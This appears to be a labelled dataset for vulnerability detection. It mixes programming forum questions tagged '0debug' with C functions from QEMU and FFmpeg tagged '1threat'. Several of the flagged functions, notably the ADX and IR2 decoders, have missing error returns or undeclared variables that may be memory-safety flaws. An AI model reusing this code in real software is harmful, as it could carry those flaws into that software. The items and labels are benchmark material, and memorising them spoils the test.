problem: string (lengths 26 to 131k)
labels: class label (2 classes)
Trying to get random value in specified range? : <p>For one of my assignments I am trying to generate a random number between 16 and 26 (both inclusive). I've read around and tried different methods, but for some reason it goes over the specified range. This is what I have at the moment:</p> <pre><code>int dealerHand = 16 + (int) (Math.random() * ((26 - 16) + 16)); </code></pre> <p>Any idea why this isn't working? Thanks!</p>
0debug
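The multiplier in the snippet above works out to `(26 - 16) + 16 = 26`, so the expression yields values in 16..41 instead of 16..26; an inclusive range needs a span of `hi - lo + 1`. A minimal sketch of the corrected arithmetic (shown in Python rather than the question's Java, purely as an illustration):

```python
import random

def rand_inclusive(lo: int, hi: int) -> int:
    """Mirror of lo + (int)(Math.random() * (hi - lo + 1)) from Java:
    random.random() is uniform in [0.0, 1.0), so the scaled value is
    strictly less than hi - lo + 1 and truncation keeps it <= hi."""
    return lo + int(random.random() * (hi - lo + 1))

# Every draw stays inside the inclusive bounds.
samples = [rand_inclusive(16, 26) for _ in range(10_000)]
print(min(samples), max(samples))  # both values lie within 16..26
```

In Java the same fix would be `16 + (int)(Math.random() * 11)`, or more simply `new Random().nextInt(11) + 16`.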
AWS BOTO3 S3 python - An error occurred (404) when calling the HeadObject operation: Not Found : <p>I am trying to download a directory inside an S3 bucket. I am using transfer to download the directory, but I am getting the error "An error occurred (404) when calling the HeadObject operation: Not Found". Please help.</p> <pre><code>S3 structure: **Bucket Folder1 File1** </code></pre> <p>Note: Trying to download Folder1</p> <pre><code>transfer.download_file(self.bucket_name, self.dir_name, self.file_dir + self.dir_name) </code></pre>
0debug
AzureDevOps - Link git commit or branch to work item via command line : <p>I've worked on projects with a Jira integration where I simply had to include the ticket number in the commit or branch name and that work would automatically link with the ticket in Jira. E.g.:</p> <blockquote> <p><code>git commit -am '123 some commit'</code></p> </blockquote> <p>And on the ticket you'd see a link to the commit.</p> <p><strong>How can I do that with Azure Dev Ops?</strong></p> <p>I know how to do it manually via Visual Studio or in the ticket itself, but I want to do it through the command line only.</p>
0debug
How to include a prototype in TypeScript : <p>I am learning Angular 2 and I have written a TS definition for a truncate method I want to use in one of my services.</p> <p>truncate.ts</p> <pre><code>interface String { truncate(max: number, decorator: string): string; } String.prototype.truncate = function(max, decorator){ decorator = decorator || '...'; return (this.length &gt; max ? this.substring(0,max)+decorator : this); }; </code></pre> <p>How do I import this into another TypeScript module, or at least make it available globally?</p>
0debug
int qemu_get_buffer(QEMUFile *f, uint8_t *buf, int size1) { int size, l; if (f->is_write) { abort(); } size = size1; while (size > 0) { l = f->buf_size - f->buf_index; if (l == 0) { qemu_fill_buffer(f); l = f->buf_size - f->buf_index; if (l == 0) { break; } } if (l > size) { l = size; } memcpy(buf, f->buf + f->buf_index, l); f->buf_index += l; buf += l; size -= l; } return size1 - size; }
1threat
static int ir2_decode_frame(AVCodecContext *avctx, void *data, int *got_frame, AVPacket *avpkt) { const uint8_t *buf = avpkt->data; int buf_size = avpkt->size; Ir2Context * const s = avctx->priv_data; AVFrame *picture = data; AVFrame * const p = &s->picture; int start, ret; if(p->data[0]) avctx->release_buffer(avctx, p); p->reference = 1; p->buffer_hints = FF_BUFFER_HINTS_VALID | FF_BUFFER_HINTS_PRESERVE | FF_BUFFER_HINTS_REUSABLE; if ((ret = avctx->reget_buffer(avctx, p)) < 0) { av_log(s->avctx, AV_LOG_ERROR, "reget_buffer() failed\n"); return ret; } start = 48; if (start >= buf_size) { av_log(s->avctx, AV_LOG_ERROR, "input buffer size too small (%d)\n", buf_size); return AVERROR_INVALIDDATA; } s->decode_delta = buf[18]; #ifndef BITSTREAM_READER_LE for (i = 0; i < buf_size; i++) buf[i] = ff_reverse[buf[i]]; #endif init_get_bits(&s->gb, buf + start, (buf_size - start) * 8); if (s->decode_delta) { ir2_decode_plane(s, avctx->width, avctx->height, s->picture.data[0], s->picture.linesize[0], ir2_luma_table); ir2_decode_plane(s, avctx->width >> 2, avctx->height >> 2, s->picture.data[2], s->picture.linesize[2], ir2_luma_table); ir2_decode_plane(s, avctx->width >> 2, avctx->height >> 2, s->picture.data[1], s->picture.linesize[1], ir2_luma_table); } else { ir2_decode_plane_inter(s, avctx->width, avctx->height, s->picture.data[0], s->picture.linesize[0], ir2_luma_table); ir2_decode_plane_inter(s, avctx->width >> 2, avctx->height >> 2, s->picture.data[2], s->picture.linesize[2], ir2_luma_table); ir2_decode_plane_inter(s, avctx->width >> 2, avctx->height >> 2, s->picture.data[1], s->picture.linesize[1], ir2_luma_table); } *picture = s->picture; *got_frame = 1; return buf_size; }
1threat
Jira Webhook to Google Calendar API : <p><br> I am having a hard time figuring out how to create a JIRA webhook that creates a Google Calendar event after an issue has been created in JIRA. <br> The start and end times of this event should be taken from custom fields in that created issue. <br> Thanks in advance.</p>
0debug
static void d3d11va_device_uninit(AVHWDeviceContext *hwdev) { AVD3D11VADeviceContext *device_hwctx = hwdev->hwctx; if (device_hwctx->device) ID3D11Device_Release(device_hwctx->device); if (device_hwctx->device_context) ID3D11DeviceContext_Release(device_hwctx->device_context); if (device_hwctx->video_device) ID3D11VideoDevice_Release(device_hwctx->video_device); if (device_hwctx->video_context) ID3D11VideoContext_Release(device_hwctx->video_context); if (device_hwctx->lock == d3d11va_default_lock) CloseHandle(device_hwctx->lock_ctx); }
1threat
Makefile with source gets error `No such file or directory` : <p>I have a really simple <code>Makefile</code> that does <code>source</code> to set ENV variables. But it doesn't work if I call it from the <code>Makefile</code>.</p> <p>I get this error:</p> <pre><code>make dev source ./bin/authenticate.sh make: source: No such file or directory make: *** [dev] Error 1 </code></pre> <p>The script exists. </p> <p>If I run this on the command line, it works. </p> <pre><code>source ./bin/authenticate.sh Works! </code></pre> <p>This is my <code>Makefile</code>:</p> <pre><code>test: pytest -s dev: source ./bin/authenticate.sh </code></pre> <p>I'm using OSX. I'm not sure if this would make a difference.</p>
0debug
I need a PL/SQL procedure or view that shows the payments made within a date range : I am working with a system that has two tables, 'Facturas' (Invoices) and 'Pagos Factura' (Invoice Payments). The 'Factura' table has the columns 'Fecha de Factura' (Invoice Date) and 'Fecha de vencimiento' (Due Date). What I need is a PL/SQL procedure or view that takes an invoice id and checks the 'Pagos Factura' table for the payments made on that invoice between its 'Fecha de Factura' and 'Fecha de vencimiento'.
0debug
Is it possible to show a div on hover? Why is my CSS not working? : Here is my code. I copied it from a tutorial and modified it for my use, but it turned out not to be what I want; it's not working. Here is my CSS: .project-item h3{ cursor: pointer; } #project-contentOne{ display: none; } .project-item :hover #project-contentOne{ display: block; } and my HTML is <div class="project-item"> <h3>University-wide High Speed Information Network</h3> <div id="project-contentOne" class="p-content"> <p>University wide High-Speed Information Network is a component of the 5-year project plan which is the eCLSU. It includes the development, deployment, and acquisition of communication infrastructure.</p> <p>This component installs and deploys communication equipment and systems that interconnect the colleges and units within the main campus and the satellite research and laboratory schools and facilities. This infrastructure must be able to support handling large and simultaneous transfers of data between different users across the campus to achieve convenience and efficiency in university operations.</p> </div> </div> I also want to put images in the content, which is why I use the div. Thank you in advance
0debug
static inline int coeff_unpack_golomb(GetBitContext *gb, int qfactor, int qoffset) { int sign, coeff; uint32_t buf; OPEN_READER(re, gb); UPDATE_CACHE(re, gb); buf = GET_CACHE(re, gb); if (buf & 0xAA800000) { buf >>= 32 - 8; SKIP_BITS(re, gb, ff_interleaved_golomb_vlc_len[buf]); coeff = ff_interleaved_ue_golomb_vlc_code[buf]; } else { unsigned ret = 1; do { buf >>= 32 - 8; SKIP_BITS(re, gb, FFMIN(ff_interleaved_golomb_vlc_len[buf], 8)); if (ff_interleaved_golomb_vlc_len[buf] != 9) { ret <<= (ff_interleaved_golomb_vlc_len[buf] - 1) >> 1; ret |= ff_interleaved_dirac_golomb_vlc_code[buf]; break; } ret = (ret << 4) | ff_interleaved_dirac_golomb_vlc_code[buf]; UPDATE_CACHE(re, gb); buf = GET_CACHE(re, gb); } while (ret<0x8000000U && BITS_AVAILABLE(re, gb)); coeff = ret - 1; } if (coeff) { coeff = (coeff * qfactor + qoffset + 2) >> 2; sign = SHOW_SBITS(re, gb, 1); LAST_SKIP_BITS(re, gb, 1); coeff = (coeff ^ sign) - sign; } CLOSE_READER(re, gb); return coeff; }
1threat
void net_slirp_redir(const char *redir_str) { struct slirp_config_str *config; if (QTAILQ_EMPTY(&slirp_stacks)) { config = qemu_malloc(sizeof(*config)); pstrcpy(config->str, sizeof(config->str), redir_str); config->flags = SLIRP_CFG_HOSTFWD | SLIRP_CFG_LEGACY; config->next = slirp_configs; slirp_configs = config; return; } slirp_hostfwd(QTAILQ_FIRST(&slirp_stacks), NULL, redir_str, 1); }
1threat
void kvm_setup_guest_memory(void *start, size_t size) { #ifdef CONFIG_VALGRIND_H VALGRIND_MAKE_MEM_DEFINED(start, size); #endif if (!kvm_has_sync_mmu()) { int ret = qemu_madvise(start, size, QEMU_MADV_DONTFORK); if (ret) { perror("qemu_madvise"); fprintf(stderr, "Need MADV_DONTFORK in absence of synchronous KVM MMU\n"); exit(1); } } }
1threat
React - Dynamically Import Components : <p>I have a page which renders different components based on user input. At the moment, I have hard coded the imports for each component as shown below:</p> <pre><code> import React, { Component } from 'react' import Component1 from './Component1' import Component2 from './Component2' import Component3 from './Component3' class Main extends Component { render() { var components = { 'Component1': Component1, 'Component2': Component2, 'Component3': Component3 }; var type = 'Component1'; // just an example var MyComponent = components[type]; return &lt;MyComponent /&gt; } } export default Main </code></pre> <p>However, I change/add components all the time. Is there a way to perhaps have a file which stores ONLY the names and paths of the components and these are then imported dynamically in another file?</p>
0debug
What is causing this: Cannot jump from switch statement to this case label : <p>This is a switch statement that I am getting errors on:</p> <pre><code> switch (transaction.transactionState) { case SKPaymentTransactionStatePurchasing: // show wait view here statusLabel.text = @"Processing..."; break; case SKPaymentTransactionStatePurchased: [[SKPaymentQueue defaultQueue] finishTransaction:transaction]; // remove wait view and unlock iClooud Syncing statusLabel.text = @"Done!"; NSError *error = nil; [SFHFKeychainUtils storeUsername:@"IAPNoob01" andPassword:@"whatever" forServiceName: kStoredData updateExisting:YES error:&amp;error]; // apply purchase action - hide lock overlay and [oStockLock setBackgroundImage:nil forState:UIControlStateNormal]; // do other thing to enable the features break; case SKPaymentTransactionStateRestored: [[SKPaymentQueue defaultQueue] finishTransaction:transaction]; // remove wait view here statusLabel.text = @""; break; case SKPaymentTransactionStateFailed: if (transaction.error.code != SKErrorPaymentCancelled) { NSLog(@"Error payment cancelled"); } [[SKPaymentQueue defaultQueue] finishTransaction:transaction]; // remove wait view here statusLabel.text = @"Purchase Error!"; break; default: break; } </code></pre> <p>The last two cases, plus the default, are giving me the following error:</p> <blockquote> <p>Cannot jump from switch statement to this case label</p> </blockquote> <p>I have used the switch statement many, many times; this is the first time I have seen this. The code has been copied from a tutorial (<a href="http://xcodenoobies.blogspot.com/2012/04/implementing-inapp-purchase-in-xcode.html" rel="noreferrer">here</a>), which I am trying to adapt for my app. Would appreciate the help on this one. SD</p>
0debug
Display ='grid' is not working in IE? Is there any solution to fix it? : I am using display: grid in CSS. It works fine in Chrome and Mozilla Firefox, but it is not working in IE. Any CSS trick or other solution?
0debug
When should we use android.arch.lifecycle:compiler (or android.arch.lifecycle:common-java8)? : <p>Currently, we are using <code>LiveData</code>, <code>ViewModel</code> and <code>Room</code> in our project.</p> <p>We are using Java 8.</p> <p>We use the following in <code>build.gradle</code></p> <pre><code>// ViewModel and LiveData implementation "android.arch.lifecycle:extensions:1.1.1" // Room (use 1.1.0-beta1 for latest beta) implementation "android.arch.persistence.room:runtime:1.0.0" annotationProcessor "android.arch.persistence.room:compiler:1.0.0" </code></pre> <p>I was wondering, when do we need to use</p> <pre><code>annotationProcessor "android.arch.lifecycle:compiler:1.1.1" </code></pre> <p>(Or <code>implementation "android.arch.lifecycle:common-java8:1.1.1"</code> since we are using Java 8?!)</p> <p>Currently, our code works fine, without using <code>lifecycle:compiler</code> or <code>lifecycle:common-java8</code>.</p>
0debug
Microservice architecture - carry message through services when order doesn't matter : <p><strong>Tl;dr</strong>: "How can I push a message through a bunch of asynchronous, unordered microservices and know when that message has made it through each of them?"</p> <p>I'm struggling to find the right messaging system/protocol for a specific microservices architecture. This isn't a "which is best" question, but a question about what my options are for a design pattern/protocol.</p> <p><a href="https://i.stack.imgur.com/MbHRf.png" rel="noreferrer"><img src="https://i.stack.imgur.com/MbHRf.png" alt="Diagram"></a></p> <ul> <li>I have a <em>message</em> on the beginning queue. Let's say a RabbitMQ message with serialized JSON</li> <li>I need that message to go through an arbitrary number of microservices</li> <li>Each of those microservices are long running, must be independent, and may be implemented in a variety of languages</li> <li>The order of services the message goes through does not matter. In fact, it should not be synchronous.</li> <li>Each service can <em>append</em> data to the original message, but that data is ignored by the other services. There should be <em>no</em> merge conflicts (each service writes a unique key). No service will change or destroy data.</li> <li>Once <em>all the services have had their turn</em>, the message should be published to a second RabbitMQ queue with the original data and the new data.</li> <li>The microservices will have no other side-effects. If this were all in one monolithic application (and in the same language), functional programming would be perfect.</li> </ul> <p>So, the question is, what is an appropriate way to manage that message through the various services? I <strong>don't</strong> want to have to do one at a time, and the order isn't important. 
But, if that's the case, how can the system know when all the services have had their whack and the final message can be written onto the ending queue (to have the next batch of services have their go)?</p> <p>The only semi-elegant solution I could come up with was </p> <ol> <li>to have the first service that encounters a message write that message to common storage (say mongodb)</li> <li>Have each service do its thing, mark that it has completed for that message, and then check to see if all the services have had their turn</li> <li>If so, that last service would publish the message</li> </ol> <p>But that still requires each service to be aware of all the other services <em>and</em> requires each service to leave its mark. Neither of those is desired.</p> <p>I am open to a "Shepherd" service of some kind.</p> <p>I would appreciate any options that I have missed, and am willing to concede that there may be a better, fundamental design.</p> <p>Thank you.</p>
0debug
static int ide_drive_post_load(void *opaque, int version_id) { IDEState *s = opaque; if (s->identify_set) { blk_set_enable_write_cache(s->blk, !!(s->identify_data[85] & (1 << 5))); } return 0; }
1threat
Compare not working in Eclipse Neon : <p>I am (finally) trying to upgrade to Eclipse Neon from Mars.2. After installing SVN support and the SVNKit (1.8.14) connector, I am able to access my repository. However <em>Compare</em> is not working. </p> <p>If I right-click a file that I have modified, and choose <em>Compare with Base from Working Copy</em>, a dialog is displayed saying <strong>There are no differences between the selected inputs</strong>. If I choose <em>Team-> Synchronize with Repository</em>, the differences are shown in the Synchronization view. Differences are also shown when comparing to Local History.</p> <p>If I use Tortoise SVN from File Explorer, the differences from the current version to the Base Working version are shown.</p> <p>Anyone have a solution / suggestion to restore this critical function?</p>
0debug
static int adx_decode_frame(AVCodecContext *avctx, void *data, int *got_frame_ptr, AVPacket *avpkt) { int buf_size = avpkt->size; ADXContext *c = avctx->priv_data; int16_t *samples; const uint8_t *buf = avpkt->data; int num_blocks, ch, ret; if (c->eof) { *got_frame_ptr = 0; return buf_size; } if(AV_RB16(buf) == 0x8000){ int header_size; if ((ret = avpriv_adx_decode_header(avctx, buf, buf_size, &header_size, c->coeff)) < 0) { av_log(avctx, AV_LOG_ERROR, "error parsing ADX header\n"); } c->channels = avctx->channels; if(buf_size < header_size) buf += header_size; buf_size -= header_size; } num_blocks = buf_size / (BLOCK_SIZE * c->channels); if (!num_blocks || buf_size % (BLOCK_SIZE * avctx->channels)) { if (buf_size >= 4 && (AV_RB16(buf) & 0x8000)) { c->eof = 1; *got_frame_ptr = 0; return avpkt->size; } } c->frame.nb_samples = num_blocks * BLOCK_SAMPLES; if ((ret = avctx->get_buffer(avctx, &c->frame)) < 0) { av_log(avctx, AV_LOG_ERROR, "get_buffer() failed\n"); return ret; } samples = (int16_t *)c->frame.data[0]; while (num_blocks--) { for (ch = 0; ch < c->channels; ch++) { if (adx_decode(c, samples + ch, buf, ch)) { c->eof = 1; buf = avpkt->data + avpkt->size; break; } buf_size -= BLOCK_SIZE; buf += BLOCK_SIZE; } samples += BLOCK_SAMPLES * c->channels; } *got_frame_ptr = 1; *(AVFrame *)data = c->frame; return buf - avpkt->data; }
1threat
How string is stored in C# : <p>After reading 2 different posts on how strings are stored, I am a little confused about which one is right.</p> <p>Please find the links below:<br> <a href="https://stackoverflow.com/questions/10782690/how-are-string-and-char-types-stored-in-memory-in-net">How are String and Char types stored in memory in .NET?</a> <br> <a href="https://stackoverflow.com/questions/3669199/c-sharp-is-string-actually-an-array-of-chars-or-does-it-just-have-an-indexer">C# - is string actually an array of chars or does it just have an indexer?</a></p>
0debug
static void *legacy_s390_alloc(size_t size) { void *mem; mem = mmap((void *) 0x800000000ULL, size, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS | MAP_FIXED, -1, 0); return mem == MAP_FAILED ? NULL : mem; }
1threat
How to record a call in Android Pie? : <p>Basically I've implemented call recording, but it stopped working after Oreo. I read an article in which Google stopped call recording after Oreo. Does anyone have any idea how to record a call in Android Pie? Code comments will be appreciated. Thanks </p>
0debug
static uint32_t parse_enumeration(char *str, EnumTable *table, uint32_t not_found_value) { uint32_t ret = not_found_value; while (table->name != NULL) { if (strcmp(table->name, str) == 0) { ret = table->value; break; } table++; } return ret; }
1threat
adapter Ecto.Adapters.Postgres was not compiled : <p>I am not able to create my Phoenix project. Would love some advice on how to fix it.</p> <p>Setup details:</p> <ul> <li>Ubuntu 16.04.4 LTS </li> <li>Erlang/OTP 21 [erts-10.1] [source] [64-bit] [smp:1:1] [ds:1:1:10] [async-threads:1] [hipe] </li> <li>Elixir 1.7.3 (compiled with Erlang/OTP 20)</li> <li>Mix 1.7.3 (compiled with Erlang/OTP 20)</li> <li>Ecto v3.0.0</li> </ul> <p>I am following the <a href="https://hexdocs.pm/phoenix/up_and_running.html#content" rel="noreferrer">Phoenix Up and Running</a> to make an app. </p> <pre><code>mix phx.new hello cd hello mix ecto.create </code></pre> <p>last command gives me:</p> <pre><code> == Compilation error in file lib/hello/repo.ex == ** (ArgumentError) adapter Ecto.Adapters.Postgres was not compiled, ensure it is correct and it is included as a project dependency lib/ecto/repo/supervisor.ex:71: Ecto.Repo.Supervisor.compile_config/2 lib/hello/repo.ex:2: (module) (stdlib) erl_eval.erl:680: :erl_eval.do_apply/6 (elixir) lib/kernel/parallel_compiler.ex:206: anonymous fn/4 in Kernel.ParallelCompiler.spawn_workers/6 </code></pre> <p>I have postgres installed. I have postgres super user. </p>
0debug
static void read_sbr_envelope(SpectralBandReplication *sbr, GetBitContext *gb, SBRData *ch_data, int ch) { int bits; int i, j, k; VLC_TYPE (*t_huff)[2], (*f_huff)[2]; int t_lav, f_lav; const int delta = (ch == 1 && sbr->bs_coupling == 1) + 1; const int odd = sbr->n[1] & 1; if (sbr->bs_coupling && ch) { if (ch_data->bs_amp_res) { bits = 5; t_huff = vlc_sbr[T_HUFFMAN_ENV_BAL_3_0DB].table; t_lav = vlc_sbr_lav[T_HUFFMAN_ENV_BAL_3_0DB]; f_huff = vlc_sbr[F_HUFFMAN_ENV_BAL_3_0DB].table; f_lav = vlc_sbr_lav[F_HUFFMAN_ENV_BAL_3_0DB]; } else { bits = 6; t_huff = vlc_sbr[T_HUFFMAN_ENV_BAL_1_5DB].table; t_lav = vlc_sbr_lav[T_HUFFMAN_ENV_BAL_1_5DB]; f_huff = vlc_sbr[F_HUFFMAN_ENV_BAL_1_5DB].table; f_lav = vlc_sbr_lav[F_HUFFMAN_ENV_BAL_1_5DB]; } } else { if (ch_data->bs_amp_res) { bits = 6; t_huff = vlc_sbr[T_HUFFMAN_ENV_3_0DB].table; t_lav = vlc_sbr_lav[T_HUFFMAN_ENV_3_0DB]; f_huff = vlc_sbr[F_HUFFMAN_ENV_3_0DB].table; f_lav = vlc_sbr_lav[F_HUFFMAN_ENV_3_0DB]; } else { bits = 7; t_huff = vlc_sbr[T_HUFFMAN_ENV_1_5DB].table; t_lav = vlc_sbr_lav[T_HUFFMAN_ENV_1_5DB]; f_huff = vlc_sbr[F_HUFFMAN_ENV_1_5DB].table; f_lav = vlc_sbr_lav[F_HUFFMAN_ENV_1_5DB]; } } for (i = 0; i < ch_data->bs_num_env; i++) { if (ch_data->bs_df_env[i]) { if (ch_data->bs_freq_res[i + 1] == ch_data->bs_freq_res[i]) { for (j = 0; j < sbr->n[ch_data->bs_freq_res[i + 1]]; j++) ch_data->env_facs_q[i + 1][j] = ch_data->env_facs_q[i][j] + delta * (get_vlc2(gb, t_huff, 9, 3) - t_lav); } else if (ch_data->bs_freq_res[i + 1]) { for (j = 0; j < sbr->n[ch_data->bs_freq_res[i + 1]]; j++) { k = (j + odd) >> 1; ch_data->env_facs_q[i + 1][j] = ch_data->env_facs_q[i][k] + delta * (get_vlc2(gb, t_huff, 9, 3) - t_lav); } } else { for (j = 0; j < sbr->n[ch_data->bs_freq_res[i + 1]]; j++) { k = j ? 
2*j - odd : 0; ch_data->env_facs_q[i + 1][j] = ch_data->env_facs_q[i][k] + delta * (get_vlc2(gb, t_huff, 9, 3) - t_lav); } } } else { ch_data->env_facs_q[i + 1][0] = delta * get_bits(gb, bits); for (j = 1; j < sbr->n[ch_data->bs_freq_res[i + 1]]; j++) ch_data->env_facs_q[i + 1][j] = ch_data->env_facs_q[i + 1][j - 1] + delta * (get_vlc2(gb, f_huff, 9, 3) - f_lav); } } memcpy(ch_data->env_facs_q[0], ch_data->env_facs_q[ch_data->bs_num_env], sizeof(ch_data->env_facs_q[0])); }
1threat
int ff_h264_decode_ref_pic_marking(H264Context *h, GetBitContext *gb, int first_slice) { int i, ret; MMCO mmco_temp[MAX_MMCO_COUNT], *mmco = mmco_temp; int mmco_index = 0; if (h->nal_unit_type == NAL_IDR_SLICE) { skip_bits1(gb); if (get_bits1(gb)) { mmco[0].opcode = MMCO_LONG; mmco[0].long_arg = 0; mmco_index = 1; } } else { if (get_bits1(gb)) { for (i = 0; i < MAX_MMCO_COUNT; i++) { MMCOOpcode opcode = get_ue_golomb_31(gb); mmco[i].opcode = opcode; if (opcode == MMCO_SHORT2UNUSED || opcode == MMCO_SHORT2LONG) { mmco[i].short_pic_num = (h->curr_pic_num - get_ue_golomb(gb) - 1) & (h->max_pic_num - 1); #if 0 if (mmco[i].short_pic_num >= h->short_ref_count || !h->short_ref[mmco[i].short_pic_num]) { av_log(s->avctx, AV_LOG_ERROR, "illegal short ref in memory management control " "operation %d\n", mmco); return -1; } #endif } if (opcode == MMCO_SHORT2LONG || opcode == MMCO_LONG2UNUSED || opcode == MMCO_LONG || opcode == MMCO_SET_MAX_LONG) { unsigned int long_arg = get_ue_golomb_31(gb); if (long_arg >= 32 || (long_arg >= 16 && !(opcode == MMCO_SET_MAX_LONG && long_arg == 16) && !(opcode == MMCO_LONG2UNUSED && FIELD_PICTURE(h)))) { av_log(h->avctx, AV_LOG_ERROR, "illegal long ref in memory management control " "operation %d\n", opcode); return -1; } mmco[i].long_arg = long_arg; } if (opcode > (unsigned) MMCO_LONG) { av_log(h->avctx, AV_LOG_ERROR, "illegal memory management control operation %d\n", opcode); return -1; } if (opcode == MMCO_END) break; } mmco_index = i; } else { if (first_slice) { ret = ff_generate_sliding_window_mmcos(h, first_slice); if (ret < 0 && h->avctx->err_recognition & AV_EF_EXPLODE) return ret; } mmco_index = -1; } } if (first_slice && mmco_index != -1) { memcpy(h->mmco, mmco_temp, sizeof(h->mmco)); h->mmco_index = mmco_index; } else if (!first_slice && mmco_index >= 0 && (mmco_index != h->mmco_index || check_opcodes(h->mmco, mmco_temp, mmco_index))) { av_log(h->avctx, AV_LOG_ERROR, "Inconsistent MMCO state between slices [%d, %d]\n", mmco_index, 
h->mmco_index); return AVERROR_INVALIDDATA; } return 0; }
1threat
From List to Jagged Array : <p>I am trying to convert a <code>List&lt;T&gt;</code> to a <code>Jagged Array T [][]</code>. But each array inside the Jagged Array is repeating the first N Elements of the List. I know that my code is doing exactly that, but how can I iterate over my list in a different way so I don't go through the same N elements?</p> <p>Please ignore the <code>DataTree&lt;T&gt;</code> type, it's just a reference data structure topology to create the Jagged Array.</p> <pre><code> public static T[][] ToJaggedArrray&lt;T&gt;(this List&lt;T&gt; data, DataTree&lt;T&gt; dataTree) { // Get total elements on each row //dataTree.DataCount = total elements in data structure int totalElementsPerArray = dataTree.DataCount / dataTree.BranchCount; // dataTree.BranchCount = number of elemets/rows int numElements = dataTree.BranchCount; T[][] outPut = new T[numElements][]; for (int i = 0; i &lt; outPut.Length; i++) { T[] temp = new T[totalElementsPerArray]; for (int j = 0; j &lt; temp.Length; j++) { temp[j] = data[j]; } outPut[i] = temp; } return outPut; } /* Output: 54 19 83 80 28 48 46 16 52 38 41 10 Element(0): 54 19 83 80 Element(1): 54 19 83 80 Element(2): 54 19 83 80 */ /* Expected Output: 54 19 83 80 28 48 46 16 52 38 41 10 Element(0): 54 19 83 80 Element(1): 28 48 46 16 Element(2): 52 38 41 10 */ </code></pre>
0debug
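The inner loop in the snippet above always reads `data[j]`, ignoring which row is being filled; each row has to start at its own offset, `i * totalElementsPerArray`. A language-agnostic sketch of that indexing fix in Python (the question's code is C#, so this only illustrates the offset logic):

```python
def to_jagged(data, rows):
    """Split data into `rows` equal chunks; row i starts at i * per_row
    instead of always reading from index 0."""
    per_row = len(data) // rows
    return [data[i * per_row:(i + 1) * per_row] for i in range(rows)]

data = [54, 19, 83, 80, 28, 48, 46, 16, 52, 38, 41, 10]
print(to_jagged(data, 3))
# -> [[54, 19, 83, 80], [28, 48, 46, 16], [52, 38, 41, 10]]
```

In the C# version the equivalent one-line change is `temp[j] = data[i * totalElementsPerArray + j];`.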
TypeError: Cannot read property of undefined between two getJSON functions : When the lengths of my 2 JSONs are the same I don't get an error, but when they aren't I get a `TypeError: Cannot read property of undefined`. JSON: json1: [ { "date": "2019-07-05", "x": 1246567, "y": 598045 }, { "date": "2019-07-06", "x": 1021607, "y": 452854 }, { "date": "2019-07-07", "x": 1031607, "y": 467854 } ] json2: [ { "date": "2019-07-05", "v": 3132769, "pv": 6643094 }, { "date": "2019-07-06", "v": 2643611, "pv": 6059584 } ] JavaScript $.getJSON(json1, result => { result.forEach((elem, i, array) => { $('#x').text(elem.x); $('#y').text(elem.y); }); $.getJSON(json2, result => { result.forEach((elem, i, array) => { let yo = 0; if ((elem.date.indexOf(json[i].date) !== -1)) { yo = json[i].x / elem.v; $('#v').text(elem.v); $('#pv').text(elem.pv); $('#vpv').text(yo); } }); }); }); When the arrays are the same length everything matches up, but when one is longer than the other I get `TypeError: Cannot read property x of undefined` (at `json[i].x`). I even added the condition `if ((elem.date.indexOf(json[i].date) !== -1))`, thinking that would fix it, but I am still getting the error. How can I fix this?
0debug
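Indexing the second response with the first loop's `i` assumes both arrays have the same length and order, which is exactly what breaks when one JSON is shorter. Joining the two arrays by their shared `date` key avoids the undefined access. A sketch of that join in Python (the question is JavaScript; the `ratio` field below stands in for the question's `yo` value):

```python
json1 = [
    {"date": "2019-07-05", "x": 1246567, "y": 598045},
    {"date": "2019-07-06", "x": 1021607, "y": 452854},
    {"date": "2019-07-07", "x": 1031607, "y": 467854},
]
json2 = [
    {"date": "2019-07-05", "v": 3132769, "pv": 6643094},
    {"date": "2019-07-06", "v": 2643611, "pv": 6059584},
]

# Index the first array by date, then join only on dates present in both.
by_date = {row["date"]: row for row in json1}
joined = [
    {**row, "ratio": by_date[row["date"]]["x"] / row["v"]}
    for row in json2
    if row["date"] in by_date
]
print(len(joined))  # 2: the unmatched 2019-07-07 entry is simply skipped
```

The same pattern in JavaScript would build a `Map` from `json1` keyed by `date` and look entries up inside the second callback instead of using the loop index.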
F# How to write a function that takes int list or string list : <p>I'm messing around in F# and tried to write a function that can take an <code>int list</code> or a <code>string list</code>. I have written a function that is logically generic, in that I can modify nothing but the type of the argument and it will run with both types of list. But I cannot generically define it to take both.</p> <p>Here is my function, without type annotation:</p> <pre class="lang-ml prettyprint-override"><code>let contains5 xs = List.map int xs |&gt; List.contains 5 </code></pre> <p>When I try to annotate the function to take a generic list, I receive a warning <code>FS0064: the construct causes the code to be less generic than indicated by the type annotations</code>. In theory I shouldn't need to annotate this to be generic, but I tried anyway.</p> <p>I can compile this in two separate files, one with</p> <pre class="lang-ml prettyprint-override"><code>let stringtest = contains5 ["1";"2";"3";"4"] </code></pre> <p>and another with</p> <pre class="lang-ml prettyprint-override"><code>let inttest = contains5 [1;2;3;4;5] </code></pre> <p>In each of these files, compilation succeeds. Alternately, I can send the function definition and one of the tests to the interpreter, and type inference proceeds just fine. If I try to compile, or send to the interpreter, the function definition and both tests, I receive <code>error FS0001: This expression was expected to have type string, but here has type int</code>.</p> <p>Am I misunderstanding how typing should work? I have a function whose code can handle a list of ints or a list of strings. I can successfully test it with either. But I can't use it in a program that handles both?</p>
0debug
import heapq as hq def raw_heap(rawheap): hq.heapify(rawheap) return rawheap
0debug
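For context on the one-line snippet above: `heapq.heapify` reorders the list in place and returns `None`, which is why the function hands back `rawheap` itself after heapifying. A reformatted version with a quick usage check:

```python
import heapq as hq

def raw_heap(rawheap):
    # heapify mutates the list in place (and returns None),
    # so we return the same, now heap-ordered, list.
    hq.heapify(rawheap)
    return rawheap

data = [5, 1, 4, 2, 3]
heap = raw_heap(data)
print(heap is data, heap[0])  # True 1 -- smallest element sits at the root
```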
void bdrv_error_action(BlockDriverState *bs, BlockErrorAction action, bool is_read, int error) { assert(error >= 0); if (action == BLOCK_ERROR_ACTION_STOP) { bdrv_iostatus_set_err(bs, error); qemu_system_vmstop_request_prepare(); send_qmp_error_event(bs, action, is_read, error); qemu_system_vmstop_request(RUN_STATE_IO_ERROR); } else { send_qmp_error_event(bs, action, is_read, error); } }
1threat
static void s390_virtio_bridge_class_init(ObjectClass *klass, void *data) { DeviceClass *dc = DEVICE_CLASS(klass); SysBusDeviceClass *k = SYS_BUS_DEVICE_CLASS(klass); k->init = s390_virtio_bridge_init; dc->no_user = 1; }
1threat
